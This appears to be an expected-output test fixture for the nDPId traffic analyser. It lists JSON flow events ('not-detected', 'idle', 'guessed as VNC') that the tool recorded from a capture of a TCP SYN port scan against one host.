+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5802,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5802,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5810,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5810,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3766,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 